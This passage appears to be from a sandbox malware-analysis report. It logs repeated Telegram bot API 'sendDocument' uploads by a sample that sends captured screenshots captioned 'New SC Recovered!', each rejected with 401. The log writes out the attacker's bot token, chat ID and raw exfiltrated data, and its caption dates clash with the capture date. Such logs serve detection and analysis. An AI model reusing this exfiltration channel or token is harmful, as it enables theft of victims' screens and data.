2024-07-25 22:02:16 UTC	16355	OUT	Data Raw: 00 a6 9f a5 1f 65 1f f3 d3 f4 ab 14 b8 a2 e0 56 fb 2f fd 34 fd 28 fb 27 fb 7f a5 58 a2 9d c0 ad f6 41 fd ff 00 d2 8f b2 0f f9 e9 fa 55 9a 28 bb 02 b7 d9 07 fc f4 fd 28 fb 20 ff 00 9e 9f a5 59 a2 8b b1 95 7e c9 ff 00 4d 3f 4a 3e c9 ff 00 4d 3f 4a b5 8a 28 bb 02 af d8 ff 00 e9 a0 fc a8 fb 1f fd 34 fd 2a d5 18 a2 ec 2e 53 7b 4d a8 cc 1f 3b 46 7a 54 70 c5 e6 b1 5d d8 e3 35 7d ff 00 d4 cb fe e1 aa b6 7f eb 4f d2 84 d8 5c 5f b1 ff 00 d3 4f d2 8f b1 8f f9 e9 fa 55 aa 28 bb 0b 95 3e c4 3f e7 a7 e9 47 d8 87 fc f4 fd 2a dd 14 5d 8e e5 4f b1 0f f9 eb fa 51 f6 21 ff 00 3d 3f 4a b7 45 17 61 72 a7 d8 47 fc f4 fd 28 fb 10 ff 00 9e bf a5 5b a2 9d d8 5c a9 f6 11 ff 00 3d 7f 4a 5f b0 8f f9 eb fa 55 aa 29 5d 85 ca bf 61 1f f3 d7 3f 85 27 d8 46 7f d6 fe 95 6e 8a 2e c2 e5 4f Data Ascii: eV/4('XAU(( Y~M?J>M?J(4.S{M;FzTp]5}O\_OU(>?G]OQ!=?JEarG([\=J_U)]a?'Fn.O
2024-07-25 22:02:16 UTC	11321	OUT	Data Raw: 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 85 25 14 50 01 49 4b 49 40 c2 92 96 92 80 0a 28 a4 a6 30 a2 8a 28 01 28 a2 8a 06 14 94 51 40 05 25 2d 25 03 0c d2 51 de 8a 06 14 51 45 00 25 14 51 40 c4 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 c2 92 96 92 80 0a 28 a2 81 89 45 14 50 02 1a 28 a4 a0 61 45 2d 25 03 0a 4a 5a 4a 00 29 29 69 28 18 52 52 d2 50 01 45 14 50 31 28 a2 8a 06 14 94 51 40 05 25 2d 25 03 0a 28 a2 80 0a 4a 28 fc 68 18 73 49 4b 49 40 c3 f1 a3 f0 a3 f1 a2 80 12 8a 28 a0 61 49 4b eb 49 40 0b 49 ef 4b f9 d2 50 01 49 45 14 0c ea a8 a2 8a 93 c1 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 90 05 14 51 4c 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 5a 06 14 94 51 da 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a4 a0 05 a4 a2 Data Ascii: (J(%PIKI@(0((Q@%-%QQE%Q@(aIKI@(EP(aE-%JZJ))i(RRPEP1(Q@%-%(J(hsIKI@(aIKI@IKPIE((((QL((((((ZQ((((
2024-07-25 22:02:16 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 32 34 34 63 32 62 63 31 61 32 34 2d 2d 0d 0a Data Ascii: -----------------------------8dcf244c2bc1a24--
2024-07-25 22:02:16 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:02:16 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49746	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:21 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcf5eb5d0922e3 Host: api.telegram.org Content-Length: 57558 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:02:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:21 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 65 62 35 64 30 39 32 32 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 65 62 35 64 30 39 32 32 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 32 36 2f 32 30 32 34 20 31 38 3a 31 33 3a 35 38 0a 55 73 65 72 Data Ascii: -----------------------------8dcf5eb5d0922e3Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcf5eb5d0922e3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 10/26/2024 18:13:58User
2024-07-25 22:02:21 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:21 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:02:21 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:02:21 UTC	7419	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:02:21 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 35 65 62 35 64 30 39 32 32 65 33 2d 2d 0d 0a Data Ascii: -----------------------------8dcf5eb5d0922e3--
2024-07-25 22:02:21 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:02:21 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49747	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:30 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcfac024112999 Host: api.telegram.org Content-Length: 57558 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:02:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:30 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 63 30 32 34 31 31 32 39 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 63 30 32 34 31 31 32 39 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 30 31 2f 32 30 32 34 20 32 31 3a 35 37 3a 31 30 0a 55 73 65 72 Data Ascii: -----------------------------8dcfac024112999Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcfac024112999Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/01/2024 21:57:10User
2024-07-25 22:02:30 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:30 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:02:30 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:02:30 UTC	7419	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:02:30 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 63 30 32 34 31 31 32 39 39 39 2d 2d 0d 0a Data Ascii: -----------------------------8dcfac024112999--
2024-07-25 22:02:30 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:02:30 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49748	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:02:41 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd0041be87c706 Host: api.telegram.org Content-Length: 57558 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:02:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:02:41 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 34 31 62 65 38 37 63 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 34 31 62 65 38 37 63 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 30 38 2f 32 30 32 34 20 32 31 3a 35 37 3a 33 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd0041be87c706Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd0041be87c706Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/08/2024 21:57:30User
2024-07-25 22:02:41 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:02:41 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:02:41 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:02:41 UTC	7419	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
